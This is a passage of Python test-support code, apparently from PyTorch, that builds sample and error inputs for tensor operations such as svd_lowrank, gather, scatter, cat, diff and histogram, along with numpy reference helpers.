device, dtype, requires_grad=False, **kwargs): for sample in sample_inputs_singular_matrix_factors(op_info, device, dtype, requires_grad, **kwargs): *batch, m, k = sample.input.shape *_, n, _ = sample.args[0].shape # NOTE: since svd_lowrank relies on non rank-revealing SVD, # it inherits the problem of unstable behavior with repeated # singular values including zeros. # Since we want to avoid (repeated) zeros as singular values, # we can only use k for q. # This issues could be resolved with using a rank-revealing SVD # which does not include "zero" singular values. 
op_kwargs = { 'q': k, 'M': None } # without M specified yield clone_sample(sample, **op_kwargs) # now with M # TODO: fix bug in the documentation for svd_lowrank: # M has to be (*, m, n), and not (*, 1, n) as written # in the documentation op_kwargs['M'] = make_tensor((*batch, m, n), dtype=dtype, device=device, requires_grad=requires_grad) yield clone_sample(sample, **op_kwargs) def chunk_iter(iterable, size): it = iter(iterable) while True: chunk = tuple(islice(it, size)) if not chunk: break yield chunk def sample_inputs_pca_lowrank(op_info, device, dtype, requires_grad=False, **kwargs): # we reuse samples from svd_lowrank, which come in groups of two: one with # kwarg['M'] = None and one with kwarg['M'] = <some tensor> samples = sample_inputs_svd_lowrank(op_info, device, dtype, requires_grad, **kwargs) for s1, s2 in chunk_iter(samples, 2): del s1.kwargs['M'] del s2.kwargs['M'] s1.kwargs['center'] = False s2.kwargs['center'] = True yield s1 yield s2 def sample_inputs_linalg_cond(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) # autograd is not supported for inputs with zero elements shapes = ((S, S), (2, S, S), (2, 1, S, S), ) for shape in shapes: yield SampleInput(make_arg(shape)) def sample_inputs_linalg_vander(op_info, device, dtype, requires_grad=False, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) shapes = ((), (1,), (S,), (2, S),) for shape in shapes: if len(shape) > 0 and shape[-1] > 1: yield SampleInput(make_arg(shape)) n = shape[-1] if len(shape) > 0 else 1 for i in range(3): # n-1, n, n+1 N = n + i - 1 if N < 2: continue yield SampleInput(make_arg(shape), kwargs=dict(N=N)) def np_vander_batched(x, N=None): # Wrapper around np.vander that supports one batch dimension (enough for these tests) if x.ndim == 0: x = x[np.newaxis] if x.ndim == 1: y = np.vander(x, N=N, increasing=True) return y else: if N is None: N = x.shape[-1] y = np.vander(x.ravel(), N=N, increasing=True).reshape((*x.shape, N)) return y def np_sinc_with_fp16_as_fp32(x): # Wraps numpy's sinc function so that fp16 values are promoted to fp32 # before sinc is invoked. Context: numpy's sinc returns NaN when evaluated # at 0 for fp16.
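# (np.sinc substitutes the tiny constant 1e-20 for zeros before dividing;
# in fp16 that constant underflows to 0, so the division yields 0/0 = NaN.)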
if x.dtype == np.float16: return np.sinc(x.astype(np.float32)) else: return np.sinc(x) def sample_inputs_broadcast_to(op_info, device, dtype, requires_grad, **kwargs): test_cases = ( ((S, 1, 1), (S, S, S)), ((S, 1, S), (S, S, S)), ((S, 1), (S, S, S)), ((1,), (S, S, S)), ((1, S), (1, 1, S)), ((), ()), ((), (1, 3, 2)), ) return tuple( SampleInput( make_tensor(size, dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad), args=(shape,)) for size, shape in test_cases) def sample_inputs_broadcast_tensors(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_cases: Tuple[tuple] = (((3,), (1, 2, 1), (1, 1), (5, 1, 1),),) samples: List[SampleInput] = [] for shape, *other_shapes in test_cases: samples.append(SampleInput(make_arg(shape), args=tuple(make_arg(s) for s in other_shapes))) return samples def reference_inputs_broadcast_tensors(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_broadcast_tensors(op, device, dtype, requires_grad, **kwargs) m = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) n = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad, noncontiguous=True) cases = ( ((), (1, 1), (1, 1, 7, 1), (3, 1, 1)), ((3, 5, 6), (1, 3, 5, 6), (1, 1, 1, 1, 6), (8, 3, 5, 6)) ) for a, b, c, d in cases: yield SampleInput(m(a), args=(m(b), m(c), m(d))) yield SampleInput(n(a), args=(n(b), n(c), n(d))) def sample_inputs_block_diag(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad) test_cases: Tuple[tuple] = ( ((1, S), (2, S), (3, S),), ((S, 1), (S, 2), (S, 3),), ((1,), (2,), (3,),), ((2, S), (S,)) ) samples: List[SampleInput] = [] for shape, *other_shapes in test_cases: samples.append(SampleInput(make_arg(shape), args=tuple(make_arg(s) for s in other_shapes))) # We also want to test mixed complex-non-complex inputs to block_diag if dtype == torch.complex32 or dtype == torch.complex64: non_complex_dtype = torch.float32 if dtype == torch.complex32 else torch.float64 make_arg_non_complex = partial(make_tensor, dtype=non_complex_dtype, device=device, requires_grad=requires_grad) samples.append(SampleInput(make_arg_non_complex(shape), args=tuple(make_arg(s) for s in other_shapes))) return samples def sample_inputs_cdist(op_info, device, dtype, requires_grad, **kwargs): small_S = 2 test_cases = ( ((S, S, 2), (S, S + 1, 2)), ((S, S), (S, S)), ((S, S, S), (S, S, S)), ((3, 5), (3, 5)), ((2, 3, 5), (2, 3, 5)), ((1, 2, 3), (1, 2, 3)), ((1, 1), (S, 1)), ((0, 5), (4, 5)), ((4, 5), (0, 5)), ((0, 4, 5), (3, 5)), ((4, 5), (0, 3, 5)), ((0, 4, 5), (1, 3, 5)), ((1, 4, 5), (0, 3, 5)), # Using S here would make this one test take 9s ((small_S, small_S, small_S + 1, 2), (small_S, small_S, small_S + 2, 2)), ((small_S, 1, 1, small_S), (1, small_S, small_S)), ((1, 1, small_S), (small_S, 1, small_S, small_S)), ) samples = [] for cm in ['use_mm_for_euclid_dist', 'donot_use_mm_for_euclid_dist']: # FIXME add an override for JIT and revert 0. 
back to 0 # since it's accepted by eager for p in [0., 1., 2., 3., 0.5, 1.5, 2.5, float("inf")]: for t1_size, t2_size in test_cases: # The args should never be non-contiguous as this is not supported in the backward samples.append(SampleInput( make_tensor(t1_size, dtype=dtype, device=device, requires_grad=requires_grad), args=(make_tensor(t2_size, dtype=dtype, device=device, requires_grad=requires_grad), p, cm))) return samples def sample_inputs_fill_(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, low=None, high=None, requires_grad=requires_grad) cases = (((S, S, S), (1,)), ((), (1,)), ((S, S, S), (make_arg(()),))) for shape, args in cases: yield SampleInput(make_arg(shape), args=args) def _fill_np(a, value): a = a.copy() a.fill(value) return a def _fill_aten(a, value): t = a * False with torch.no_grad(): t.fill_(value) return t def _fill_sample_kwargs(device, dtype, input): if dtype is torch.bool: value = True else: value = 3 return ({'value': value}, {'value': value}) def sample_inputs_comparison_ops(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_elementwise_binary(op, device, dtype, requires_grad, **kwargs) # Adds a sample input where both tensors have the same values make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) lhs = make_arg((S, S)) yield SampleInput(lhs, args=(lhs.clone(),)) def sample_inputs_stack(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # shape x number of tensors cases = ( ((3, 4), 1), ((1, 2, 1, 4), 3), ((0, 1, 0), 2),) for shape, num_tensors in cases: tensors = [] for _ in range(num_tensors): tensors.append(make_arg(shape)) for dim in range(-1, len(shape) - 1): yield SampleInput(tensors, args=(dim,)) def sample_inputs_cat_concat(op_info, device, dtype, requires_grad, **kwargs): make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) cases: Tuple[tuple, tuple, dict] = ( # type: ignore[assignment] ((S, S), (S, S), {'dim': -1}), ((S, S), (S, S), {'dim': 1}), ((M, S), (S, S), {'dim': 0}), # different shapes ((1, 2, 3), (1, 2, 3), {'dim': -2}), ((0,), (0,), {'dim': 0}), # empty tensor ((0, S), (S, S), {'dim': 0}), ((1,), (1,), {}) # dim not passed, fallback to default ) for input_shape1, input_shape2, kwargs in cases: yield SampleInput([make_arg(input_shape1), make_arg(input_shape2)], kwargs=kwargs) def reference_inputs_cat(op, device, dtype, requires_grad, **kwargs): yield from sample_inputs_cat_concat(op, device, dtype, requires_grad, **kwargs) make_arg = partial(make_tensor, device=device, dtype=dtype, requires_grad=requires_grad) # Noncontiguous type promoting tensors a = make_arg((3, 4, 2)) b = make_arg((3, 2, 2), noncontiguous=True, dtype=torch.double) c = make_arg((3, 3, 2), dtype=torch.float16).permute(1, 0, 2) yield SampleInput((a, b, c), kwargs={'dim': 1}) # Special 1D tensor with dim length of 0 case a = make_arg((0,)) b = make_arg((3, 2, 2)) yield SampleInput((a, b, a)) yield SampleInput((a, a, a)) def _elementwise_type_promo_np(*args, type_promotion_kind): def _maybe_torch(x): if isinstance(x, np.ndarray): return torch.from_numpy(x) return x flattened = tree_flatten(args)[0] transformed = tuple(_maybe_torch(a) for a in flattened) result_dtype, _ = prims.utils.elementwise_dtypes( *transformed, type_promotion_kind=type_promotion_kind) return torch_to_numpy_dtype_dict[result_dtype] def _cat_np(input_seq, dim=0): 
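# torch.cat ignores 1D empty tensors (a legacy special case), so they are
# filtered out before delegating to np.concatenate.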
def _cat_np(input_seq, dim=0):
    inputs = tuple(a for a in input_seq if not (a.ndim == 1 and a.size == 0))

    if len(inputs) == 0:
        np_dtype = _elementwise_type_promo_np(
            input_seq,
            type_promotion_kind=prims.utils.ELEMENTWISE_TYPE_PROMOTION_KIND.NO_OPMATH)
        return np.empty(0, dtype=np_dtype)

    return np.concatenate(inputs, axis=dim)

def _floor_divide_np(a, b):
    dtype = _elementwise_type_promo_np(
        a, b,
        type_promotion_kind=prims.utils.ELEMENTWISE_TYPE_PROMOTION_KIND.DEFAULT)
    if isinstance(a, np.ndarray):
        a = a.astype(dtype)
    if isinstance(b, np.ndarray):
        b = b.astype(dtype)
    return np.floor_divide(a, b)

def sample_inputs_hstack_dstack_vstack(op_info, device, dtype, requires_grad, **kwargs):
    tensors = [
        make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),
        make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),
        make_tensor((S, S), dtype=dtype, device=device, requires_grad=requires_grad),
    ]

    return (SampleInput(tensors),)

def sample_inputs_gather(op_info, device, dtype, requires_grad, **kwargs):
    return (
        SampleInput(
            make_tensor((M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=(0, gather_variable((S, S), 1, M, True, device=device))),
        SampleInput(
            make_tensor((M, S), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=(1, gather_variable((M, S // 2), 0, S, True, device=device))),
        SampleInput(
            make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=(0, torch.tensor([0], dtype=torch.int64, device=device))),
        # Empty index tensor case, see: https://github.com/pytorch/pytorch/pull/65006
        SampleInput(
            make_tensor((S,), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=(0, torch.tensor([], dtype=torch.uint8, device=device))),
        SampleInput(
            make_tensor((), dtype=dtype, device=device, low=None, high=None, requires_grad=requires_grad),
            args=(0, torch.tensor(0, dtype=torch.int64, device=device))),
    )

def _fill_indices(idx, dim, dim_size, elems_per_row, m, n, o):
    for i in range(1 if dim == 0 else m):
        for j in range(1 if dim == 1 else n):
            for k in range(1 if dim == 2 else o):
                ii = [i, j, k]
                ii[dim] = slice(0, idx.size(dim) + 1)
                idx[tuple(ii)] = torch.randperm(dim_size)[0:elems_per_row]

def error_inputs_gather(op_info, device, **kwargs):
    # src is [1, 2]
    #        [3, 4]
    src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32)

    # idx is [0, 0]
    #        [1, 0]
    idx = torch.tensor(((0, 0), (1, 0)), device=device, dtype=torch.long)

    # Index should be smaller than self except on dimension 1
    bad_src = make_tensor((1, 1), device=device, dtype=torch.float32)
    yield ErrorInput(SampleInput(bad_src, args=(1, idx,)),
                     error_regex="Size does not match at dimension 0")

    # Index must have long dtype
    bad_idx = idx.to(torch.int32)
    yield ErrorInput(SampleInput(src, args=(1, bad_idx)),
                     error_regex="Expected dtype int64 for index")

    # TODO: FIXME
    # out.dtype must match src.dtype
    # Creates new src & idx since SampleInputs can't share tensors
    src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32)
    idx = torch.tensor(((0, 0), (1, 0)), device=device, dtype=torch.long)
    out = torch.empty((2, 2), device=device, dtype=torch.float64)
    yield ErrorInput(SampleInput(src, args=(1, idx), kwargs={'out': out}),
                     error_regex="Expected out tensor to have dtype")

    # src and index tensors must have the same # of dimensions
    # idx too few dimensions
    src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32)
    idx = torch.tensor((0, 0), device=device, dtype=torch.long)
    yield ErrorInput(SampleInput(src, args=(1, idx)),
                     error_regex="Index tensor must have the same number of dimensions")

    # src too few dimensions
    src = torch.tensor((1, 2), device=device, dtype=torch.float32)
    idx = torch.tensor(((0, 0), (1, 0)), device=device, dtype=torch.long)
    yield ErrorInput(SampleInput(src, args=(0, idx)),
                     error_regex="Index tensor must have the same number of dimensions")

    # index out of bounds
    # NOTE: this ErrorInput is guarded because bounds checking does not occur on CUDA devices
    if torch.device(device).type == 'cpu':
        src = torch.tensor(((1, 2), (3, 4)), device=device, dtype=torch.float32)
        idx = torch.tensor(((0, 23), (1, 0)), device=device, dtype=torch.long)
        yield ErrorInput(SampleInput(src, args=(1, idx,)),
                         error_regex="index 23 is out of bounds for dimension")

    x = torch.rand((1,), device=device).expand((3,))
    src = torch.rand((6,), device=device)
    ind = torch.tensor([2, 1, 0], device=device, dtype=torch.int64)

    yield ErrorInput(SampleInput(src, args=(0, ind,), kwargs=dict(out=x)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

    yield ErrorInput(SampleInput(src, args=(0, ind,), kwargs=dict(out=src)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

    yield ErrorInput(SampleInput(ind.clone(), args=(0, ind[1:],), kwargs=dict(out=ind[:1])),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

def error_inputs_take(op_info, device, **kwargs):
    x = torch.rand((1,), device=device).expand((3,))
    src = torch.rand((6,), device=device)
    ind = torch.tensor([2, 1, 0], device=device, dtype=torch.int64)

    yield ErrorInput(SampleInput(src, args=(ind,), kwargs=dict(out=x)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

    yield ErrorInput(SampleInput(src, args=(ind,), kwargs=dict(out=src)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

    yield ErrorInput(SampleInput(ind.clone(), args=(ind[1:],), kwargs=dict(out=ind[:-1])),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')
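# Hypothetical usage sketch: an ErrorInput pairs a SampleInput with the
# exception type and message regex the op is expected to raise. Assuming the
# standard ErrorInput fields (sample_input, error_type, error_regex), a
# harness would exercise the generator above roughly like this.
def _demo_check_take_error_inputs():
    import re
    for ei in error_inputs_take(None, 'cpu'):
        si = ei.sample_input
        try:
            torch.take(si.input, *si.args, **si.kwargs)
        except ei.error_type as e:
            assert re.search(ei.error_regex, str(e))
        else:
            raise AssertionError("expected the op to raise")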
# Error inputs for scatter
def error_inputs_scatter_and_scatter_add(op_info, device, **kwargs):
    # Error when self.dtype != src.dtype (and src is not a scalar)
    src = make_tensor((2, 5), device=device, dtype=torch.float32)
    idx = torch.tensor(((0, 1), (1, 2)), device=device, dtype=torch.long)
    dst = torch.zeros((3, 5), device=device, dtype=torch.double)
    yield ErrorInput(SampleInput(dst, args=(0, idx, src)),
                     error_regex="Expected self.dtype to be equal to src.dtype")

    # Index dtype must be long
    src = make_tensor((2, 5), device=device, dtype=torch.float32)
    idx = torch.tensor(((0, 1), (1, 2)), device=device, dtype=torch.int32)
    dst = torch.zeros((3, 5), device=device, dtype=torch.float32)
    yield ErrorInput(SampleInput(dst, args=(0, idx, src)),
                     error_regex="Expected dtype int64 for index")

    # Index and destination must have the same number of dimensions
    src = make_tensor((2, 5), device=device, dtype=torch.float32)
    idx = torch.tensor(((0, 1), (1, 2)), device=device, dtype=torch.long)
    dst = torch.zeros((3, 5, 3), device=device, dtype=torch.float32)
    yield ErrorInput(SampleInput(dst, args=(0, idx, src)),
                     error_regex="Index tensor must have the same number of dimensions as self tensor")

    # Index and src must have the same number of dimensions when src is not a scalar
    src = make_tensor((2, 5, 2), device=device, dtype=torch.float32)
    idx = torch.tensor(((34, 1), (1, 2)), device=device, dtype=torch.long)
    dst = torch.zeros((3, 5), device=device, dtype=torch.float32)
    yield ErrorInput(SampleInput(dst, args=(0, idx, src)),
                     error_regex="Index tensor must have the same number of dimensions as src tensor")

    # Index out of bounds
    # NOTE: this ErrorInput is guarded because bounds checking does not occur on CUDA devices
    if torch.device(device).type == 'cpu':
        src = make_tensor((2, 5), device=device, dtype=torch.float32)
        idx = torch.tensor(((34, 1), (1, 2)), device=device, dtype=torch.long)
        dst = torch.zeros((3, 5), device=device, dtype=torch.float32)
        yield ErrorInput(SampleInput(dst, args=(0, idx, src)),
                         error_regex="index 34 is out of bounds for dimension 0 with size 3")

def error_inputs_renorm(op_info, device, **kwargs):
    zero_d = torch.randn((), device=device)
    yield ErrorInput(SampleInput(zero_d, args=(0.5, 0, 1.0)), error_type=RuntimeError,
                     error_regex="needs at least 2 dimensions, got 0 dimensions")

def error_inputs_lstsq(op_info, device, **kwargs):
    zero_d = torch.randn((), device=device)
    yield ErrorInput(SampleInput(zero_d, args=(zero_d)), error_type=TypeError,
                     error_regex="iteration over a 0-d tensor")

def error_inputs_eig(op_info, device, **kwargs):
    zero_d = torch.randn((), device=device)

    yield ErrorInput(SampleInput(zero_d, args=(False,)), error_type=RuntimeError,
                     error_regex="input should be 2 dimensional")

    yield ErrorInput(SampleInput(zero_d, args=(True,)), error_type=RuntimeError,
                     error_regex="input should be 2 dimensional")

def error_inputs_ormqr(op_info, device, **kwargs):
    # this is only implemented on cpu
    if (torch.device(device).type == 'cpu'):
        zero_d = torch.randn((), device=device)
        yield ErrorInput(SampleInput(zero_d, args=(zero_d, zero_d)), error_type=RuntimeError,
                         error_regex="input must have at least 2 dimensions")

def error_inputs_diag(op_info, device, **kwargs):
    zero_d = torch.randn((), device=device)
    yield ErrorInput(SampleInput(zero_d, args=(zero_d)), error_type=TypeError,
                     error_regex="iteration over a 0-d tensor")

def error_inputs_embedding(op_info, device, **kwargs):
    indices = torch.rand(2, 2, device=device).long()
    weights = [
        torch.tensor(1.0, device=device),
        torch.tensor(1.0, device=device).reshape(1, 1, 1),
    ]

    for weight in weights:
        yield ErrorInput(SampleInput(weight, args=(indices,)), error_type=RuntimeError,
                         error_regex="'weight' must be 2-D")

def error_inputs_t(op_info, device, **kwargs):
    yield ErrorInput(
        SampleInput(torch.randn(2, 3, 4, 5, device=device)),
        error_type=RuntimeError,
        error_regex="expects a tensor with <= 2",
    )

def error_inputs_multinomial(op_info, device, **kwargs):
    x = torch.empty(1, 2, 3, dtype=torch.double, device=device)
    yield ErrorInput(SampleInput(x, args=(2,)), error_type=RuntimeError,
                     error_regex="prob_dist must be 1 or 2 dim")

    x = torch.empty(1, 2, dtype=torch.long, device=device)
    yield ErrorInput(SampleInput(x, args=(2,)), error_type=RuntimeError,
                     error_regex="multinomial only supports floating-point dtypes for input")

    x = torch.empty(1, 2, dtype=torch.double, device=device)
    y = torch.empty(1, 2, dtype=torch.double, device=device)
    yield ErrorInput(SampleInput(x, args=(2,), kwargs=dict(out=y)), error_type=RuntimeError,
                     error_regex="multinomial expects Long tensor out")

    x = torch.empty(2, dtype=torch.double, device=device)
    yield ErrorInput(SampleInput(x, args=(0,)), error_type=RuntimeError,
                     error_regex="cannot sample n_sample <= 0 samples")

    x = torch.empty(2, dtype=torch.double, device=device)
    yield ErrorInput(SampleInput(x, args=(-1,)), error_type=RuntimeError,
                     error_regex="cannot sample n_sample <= 0 samples")

    x = torch.empty(2, dtype=torch.double, device=device)
    yield ErrorInput(SampleInput(x, args=(3, False,)), error_type=RuntimeError,
                     error_regex="cannot sample n_sample > prob_dist")

    x = torch.empty(16777217, dtype=torch.double, device=device)
    yield ErrorInput(SampleInput(x, args=(3,)), error_type=RuntimeError,
                     error_regex="number of categories cannot exceed")

def error_inputs_gradient(op_info, device, **kwargs):
    for dtype in [torch.long, torch.float32, torch.complex64]:
        t = torch.tensor([[1, 2, 3], [4, 5, 6], [7, 8, 9]], device=device, dtype=dtype)

        dim = (1, 0)
        spacing = [0.1]
        yield ErrorInput(SampleInput(t, kwargs=dict(spacing=spacing, dim=dim, edge_order=1)),
                         error_type=RuntimeError,
                         error_regex='torch.gradient expected spacing to be unspecified, a scalar ')

        yield ErrorInput(SampleInput(t, kwargs=dict(edge_order=3)),
                         error_type=RuntimeError,
                         error_regex='torch.gradient only supports edge_order=1 and edge_order=2.')

        dim = (1, 1)
        spacing = 0.1
        yield ErrorInput(SampleInput(t, kwargs=dict(spacing=spacing, dim=dim, edge_order=1)),
                         error_type=RuntimeError,
                         error_regex='dim 1 appears multiple times in the list of dims')

        dim = (0, 1)
        coordinates = [torch.tensor([1, 2, 4], device='cpu'), torch.tensor([1, 2, 4], device='meta')]
        yield ErrorInput(SampleInput(t, kwargs=dict(spacing=coordinates, dim=dim, edge_order=1)),
                         error_type=RuntimeError,
                         error_regex='torch.gradient expected each tensor to be on the same device,')

        yield ErrorInput(SampleInput(t, kwargs=dict(dim=3)),
                         error_type=IndexError, error_regex='')

        t = torch.tensor([[1], [2], [3]])
        yield ErrorInput(SampleInput(t, kwargs=dict(edge_order=1)),
                         error_type=RuntimeError,
                         error_regex='torch.gradient expected each dimension size to be at least')

        t = torch.tensor([[1, 2], [3, 4]])
        yield ErrorInput(SampleInput(t, kwargs=dict(edge_order=2)),
                         error_type=RuntimeError,
                         error_regex='torch.gradient expected each dimension size to be at least')

def error_inputs_masked_select(op_info, device, **kwargs):
    x = torch.rand((1,), device=device).expand((3,))
    y = torch.rand((6,), device=device)
    mask = torch.tensor([True, False, True, True, False, False], device=device)

    yield ErrorInput(SampleInput(y, args=(mask,), kwargs=dict(out=x)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

    yield ErrorInput(SampleInput(y, args=(mask,), kwargs=dict(out=y)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

    yield ErrorInput(SampleInput(mask.clone(), args=(mask,), kwargs=dict(out=mask)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

def error_inputs_index_select(op_info, device, **kwargs):
    x = torch.rand((1, 6), device=device).expand((2, 6))
    y = torch.rand((3, 6), device=device)
    ind = torch.tensor([0, 1], dtype=torch.int64, device=device)

    yield ErrorInput(SampleInput(y, args=(1, ind,), kwargs=dict(out=x)),
                     error_type=RuntimeError,
                     error_regex='unsupported operation')

def error_inputs_logcumsumexp(op_info, device, **kwargs):
    dim = 3
    srcs = [torch.randn(5, 2, device=device), torch.randn(0, 2, device=device)]
    for src in srcs:
        yield ErrorInput(SampleInput(src, args=(dim,)),
                         error_type=IndexError, error_regex='Dimension out of range')
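# Quick illustration (hypothetical helper, not used by the tests): for
# torch.gradient, `spacing` may be a scalar step, one scalar per dim, or
# per-dim coordinate tensors; the error inputs above probe the malformed
# combinations. A well-formed coordinate-tensor call looks like this.
def _demo_gradient_spacing():
    t = torch.tensor([[1., 2., 4.], [2., 4., 8.]])
    # one coordinate tensor per differentiated dim, lengths matching t's sizes
    coords = (torch.tensor([0., 1.]), torch.tensor([0., 1., 3.]))
    return torch.gradient(t, spacing=coords, dim=(0, 1), edge_order=1)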
def sample_inputs_take_along_dim(op_info, device, dtype, requires_grad, **kwargs):
    return (SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=None, high=None,
                                    requires_grad=requires_grad),
                        args=(gather_variable((S, S), 1, S, True, device=device), 0)),

            # `indices` broadcast
            SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=None, high=None,
                                    requires_grad=requires_grad),
                        args=(gather_variable((1, S // 2), 0, S, True, device=device), 1)),

            # `self` broadcast
            SampleInput(make_tensor((1, S), dtype=dtype, device=device, low=None, high=None,
                                    requires_grad=requires_grad),
                        args=(gather_variable((S, S // 2), 0, S, True, device=device), 1)),

            # without `dim` arg
            SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=None, high=None,
                                    requires_grad=requires_grad),
                        args=(gather_variable((S, S // 2), 0, S, True, device=device), )),
            SampleInput(make_tensor((S, S), dtype=dtype, device=device, low=None, high=None,
                                    requires_grad=requires_grad),
                        args=(gather_variable((S, S // 2), 0, S, True, device=device),)),
            )

def error_inputs_aminmax_amax_amin(op_info, device, **kwargs):
    # Error Inputs for zero-dim tensors, when 'dim' arg is not provided.
    shape = (S, 0, S)
    err_msg_amax_amin = "reduction"
    err_msg_aminmax = "cannot compute aminmax over an empty dimension as the operation has no identity"
    if op_info.name in ['amax', 'amin', '_refs.amax', '_refs.amin']:
        yield ErrorInput(SampleInput(torch.rand(shape, device=device)), error_regex=err_msg_amax_amin)
    elif op_info.name in ['aminmax']:
        yield ErrorInput(SampleInput(torch.rand(shape, device=device)), error_regex=err_msg_aminmax)

    # Error Inputs for tensors with more than 64 dimension
    sizes = [1] * 65
    err_msg1 = "only tensors with up to 64 dims are supported"
    yield ErrorInput(SampleInput(torch.randn(sizes, device=device), kwargs={'dim': -1}),
                     error_regex=err_msg1)
    yield ErrorInput(SampleInput(torch.randn(sizes, device=device), kwargs={'dim': 64}),
                     error_regex=err_msg1)

    # Error Inputs for repeated 'dim'
    if op_info.name in ['amax', 'amin', '_refs.amax', '_refs.amin']:
        dims = [(0, 0), (0, -4)]
        err_msg2 = "in the list of dims"
        x = torch.randn(S, S, S, S, device=device)
        for dim in dims:
            yield ErrorInput(SampleInput(x, kwargs={'dim': dim}), error_regex=err_msg2)

    # Error Input for illegal dtype
    input5 = torch.randn(L, L, dtype=torch.float32, device=device)
    max_values = torch.empty(L, dtype=torch.float32, device=device)
    min_values = torch.empty(L, dtype=torch.double, device=device)
    illegal_values = torch.empty(L, dtype=torch.int, device=device)

    err_msg_amax_amin2 = "Expected the dtype for input and out to match"
    err_msg_aminmax2 = "Expected out tensor to have dtype float, but got double instead"

    if op_info.name in ['amax', 'amin', '_refs.amax', '_refs.amin']:
        yield ErrorInput(SampleInput(input5, kwargs={'dim': 0, 'out': illegal_values}),
                         error_regex=err_msg_amax_amin2)
    elif op_info.name in ['aminmax']:
        yield ErrorInput(SampleInput(input5, kwargs={'dim': 0, 'out': (max_values, min_values)}),
                         error_regex=err_msg_aminmax2)

    # Error Inputs for functions to raise an error on specified zero'd dimension as reduction dim
    err_msg3 = "reduction"
    # FIXME: eager and ref impl throw different types of errors
    error_type = IndexError if 'refs' not in op_info.name else RuntimeError
    yield ErrorInput(SampleInput(torch.rand(shape, device=device), kwargs={'dim': 1}),
                     error_type=error_type, error_regex=err_msg3)

def sample_inputs_aminmax(op_info, device, dtype, requires_grad, **kwargs):
    test_cases: Tuple[tuple, dict] = (  # type: ignore[assignment]
        ((S, S, S), {}),
        ((S, S, S), {'dim': 1}),
        ((S, S, S), {'dim': 1, 'keepdim': True}),
        ((), {'dim': 0}),
        ((), {}),
        ((), {'dim': 0, 'keepdim': True}),
    )

    samples: List[SampleInput] = []
    for shape, kwargs in test_cases:
        samples.append(SampleInput(
            make_tensor(shape, dtype=dtype, device=device, requires_grad=requires_grad),
            kwargs=kwargs))

    return samples

def sample_inputs_diff(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    test_cases = (
        ((1,), 0, None, None),
        ((S,), 0, None, None),
        ((S, 1), 0, None, None),
        ((S, 1), 1, None, None),
        ((S, S), 0, None, None),
        ((S, S), 1, None, None),
        ((S, S), 0, (1, S), (2, S)),
        ((S, S), 0, None, (2, S)),
        ((S, S, S), 1, None, None),
        ((S, S, S), 2, None, None),
        ((S, S, S), 1, (S, 1, S), (S, 1, S)),
        ((S, S, S), 2, (S, S, 1), (S, S, 1)),
        ((S, S, S), 2, (S, S, S), (S, S, S)),)

    sample_inputs = []
    for size, dim, size_prepend, size_append in test_cases:
        prepend_size = 0 if (size_prepend is None) else size_prepend[dim]
        append_size = 0 if (size_append is None) else size_append[dim]
        dim_size = size[dim] + prepend_size + append_size
        for n in range(dim_size):
            input_tensor = make_arg(size)
            prepend = make_arg(size_prepend) if size_prepend else None
            append = make_arg(size_append) if size_append else None
            sample_inputs.append(SampleInput(input_tensor, args=(n, dim, prepend, append,)))

    # add some samples with n > dim_size
    sample_inputs.append(SampleInput(make_arg((S, S, S)), args=(S + 1, 1,)))
    sample_inputs.append(SampleInput(make_arg((S, S, S)),
                                     args=(S * 3 + 2, 2, make_arg((S, S, S)), make_arg((S, S, S)),)))

    return sample_inputs

def sample_inputs_histogram(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)

    sizes = ((), (S,), (S, S), (S, S, S), (S, 1, S), (S, 0, S))

    sample_inputs = []
    for size, bin_ct, weighted, density in product(sizes, range(1, 5), [False, True], [False, True]):
        input_tensor = make_arg(size)
        weight_tensor = make_arg(size) if weighted else None

        sample_inputs.append(SampleInput(input_tensor, args=(bin_ct,),
                                         kwargs=dict(weight=weight_tensor, density=density)))

        bins_tensor = make_arg((bin_ct + 1,))
        sample_inputs.append(SampleInput(input_tensor, args=(bins_tensor,),
                                         kwargs=dict(weight=weight_tensor, density=density)))

    return sample_inputs

def sample_inputs_histogramdd(op_info, device, dtype, requires_grad, **kwargs):
    make_arg = partial(make_tensor, dtype=dtype, device=device, requires_grad=requires_grad)
